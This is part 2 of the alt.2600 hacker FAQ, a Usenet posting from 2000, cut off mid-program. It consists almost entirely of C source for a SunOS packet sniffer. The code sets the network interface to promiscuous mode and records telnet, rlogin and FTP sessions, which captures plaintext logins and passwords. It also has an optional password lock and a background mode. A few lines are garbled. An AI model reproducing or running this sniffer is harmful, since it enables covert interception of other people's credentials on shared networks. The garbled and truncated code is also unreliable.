XPost: alt.2600, alt.answers 
 From: harlequin@fnord.org.uk 
  
 Archive-Name: alt-2600/faq/part2 
 Posting-Frequency: Random 
 Last-Modified: 2000/05/29 
 Version: .014 
  
 register u_int pktlen; 
 { 
  register struct ip     *ip; 
  register struct tcphdr *tcph; 
  
  { register u_short EtherType=ntohs(((struct 
                         ether_header *)cp)->ether_type); 
  
    if(EtherType < 0x600) { 
      EtherType = *(u_short *)(cp + SZETH + 6); 
      cp+=8; pktlen-=8; 
    } 
  
    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ 
       return; 
  } 
  
     /* ugh, gotta do an alignment :-( */ 
  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); 
  
  ip = (struct ip *)Packet; 
  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ 
     return; 
  tcph = (struct tcphdr *)(Packet + IPHLEN); 
  
  if(!( (TCPD == IPPORT_TELNET) || 
        (TCPD == IPPORT_LOGINSERVER) || 
        (TCPD == IPPORT_FTP) 
    )) return; 
  
  { register struct CREC *CLm; 
    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); 
    register u_char *p = (u_char *)Packet; 
  
    p += ((IPHLEN * 4) + (TCPOFF * 4)); 
  
  if(debug) { 
   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); 
   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); 
   fprintf(LOG,"%s[%s]\\n", inet_ntoa(IPD),SERVp(TCPD)); 
  } 
  
    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { 
  
       CLm->PKcnt++; 
  
       if(length>0) 
         if( (CLm->Length + length) < MAXBUFLEN ) { 
           ADDDATA_NODE( CLm, p,length); 
         } else { 
           END_NODE( CLm, p,length, "DATA LIMIT"); 
         } 
  
       if(TCPFL(TH_FIN|TH_RST)) { 
           END_NODE( CLm, (u_char *)NULL,0, 
                 TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); 
       } 
  
    } else { 
  
       if(TCPFL(TH_SYN)) { 
          ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); 
       } 
  
    } 
  
    IDLE_NODE(); 
  
  } 
  
 } 
  
 /* signal handler 
  */ 
 void death() 
 { register struct CREC *CLe; 
  
     while(CLe=CLroot) 
         END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); 
  
     fprintf(LOG,"\\nLog ended at => %s\\n",NOWtm()); 
     fflush(LOG); 
     if(LOG != stdout) 
         fclose(LOG); 
     exit(1); 
 } 
  
 /* opens network interface, performs ioctls and reads from it, 
  * passing data to filter function 
  */ 
 void do_it() 
 { 
     int cc; 
     char *buf; 
     u_short sp_ts_len; 
  
     if(!(buf=malloc(CHUNKSIZE))) 
         Pexit(1,"Eth: malloc"); 
  
 /* this /dev/nit initialization code pinched from etherfind */ 
   { 
     struct strioctl si; 
     struct ifreq    ifr; 
     struct timeval  timeout; 
     u_int  chunksize = CHUNKSIZE; 
     u_long if_flags  = NI_PROMISC; 
  
     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) 
         Pexit(1,"Eth: nit open"); 
  
     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) 
         Pexit(1,"Eth: ioctl (I_SRDOPT)"); 
  
     si.ic_timout = INFTIM; 
  
     if(ioctl(if_fd, I_PUSH, "nbuf") < 0) 
         Pexit(1,"Eth: ioctl (I_PUSH \\"nbuf\\")"); 
  
     timeout.tv_sec = 1; 
     timeout.tv_usec = 0; 
     si.ic_cmd = NIOCSTIME; 
     si.ic_len = sizeof(timeout); 
     si.ic_dp  = (char *)&timeout; 
     if(ioctl(if_fd, I_STR, (char *)&si) < 0) 
         Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); 
  
     si.ic_cmd = NIOCSCHUNK; 
     si.ic_len = sizeof(chunksize); 
     si.ic_dp  = (char *)&chunksize; 
     if(ioctl(if_fd, I_STR, (char *)&si) < 0) 
         Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); 
  
     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); 
     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\\0'; 
     si.ic_cmd = NIOCBIND; 
     si.ic_len = sizeof(ifr); 
     si.ic_dp  = (char *)𝔦 
     if(ioctl(if_fd, I_STR, (char *)&si) < 0) 
         Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); 
  
     si.ic_cmd = NIOCSFLAGS; 
     si.ic_len = sizeof(if_flags); 
     si.ic_dp  = (char *)&if_flags; 
     if(ioctl(if_fd, I_STR, (char *)&si) < 0) 
         Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); 
  
     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) 
         Pexit(1,"Eth: ioctl (I_FLUSH)"); 
   } 
  
     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { 
         register char *bp = buf, 
                       *bufstop = (buf + cc); 
  
         while (bp < bufstop) { 
             register char *cp = bp; 
             register struct nit_bufhdr *hdrp; 
  
             hdrp = (struct nit_bufhdr *)cp; 
             cp += sizeof(struct nit_bufhdr); 
             bp += hdrp->nhb_totlen; 
             filter(cp, (u_long)hdrp->nhb_msglen); 
         } 
     } 
     Pexit((-1),"Eth: read"); 
 } 
  /* Authorize your program, generate your own password and uncomment here */ 
 /* #define AUTHPASSWD "EloiZgZejWyms" */ 
  
 void getauth() 
 { char *buf,*getpass(),*crypt(); 
   char pwd[21],prmpt[81]; 
  
     strcpy(pwd,AUTHPASSWD); 
     sprintf(prmpt,"(%s)UP? ",ProgName); 
     buf=getpass(prmpt); 
     if(strcmp(pwd,crypt(buf,pwd))) 
         exit(1); 
 } 
     */ 
 void main(argc, argv) 
 int argc; 
 char **argv; 
 { 
     char   cbuf[BUFSIZ]; 
     struct ifconf ifc; 
     int    s, 
            ac=1, 
            backg=0; 
  
     ProgName=argv[0]; 
  
  /*     getauth(); */ 
  
     LOG=NULL; 
     device=NULL; 
     while((acifr_name; 
     } 
  
     fprintf(ERR,"Using logical device %s [%s]\\n",device,NIT_DEV); 
     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", 
             (debug)?" (debug)":"",(backg)?" Backgrounding ":"\\n"); 
  
     if(!LOG) 
         LOG=stdout; 
  
     signal(SIGINT, death); 
     signal(SIGTERM,death); 
     signal(SIGKILL,death); 
     signal(SIGQUIT,death); 
  
     if(backg && debug) { 
          fprintf(ERR,"[Cannot bg with debug on]\\n"); 
          backg=0; 
     } 
  
     if(backg) { 
         register int s; 
  
         if((s=fork())>0) { 
            fprintf(ERR,"[pid %d]\\n",s); 
            exit(0); 
         } else if(s<0) 
            Pexit(1,"fork"); 
  
  
 [continued in next message] 
  
 --- SoupGate-Win32 v1.05 
  * Origin: you cannot sedate... all the things you hate (1:229/2)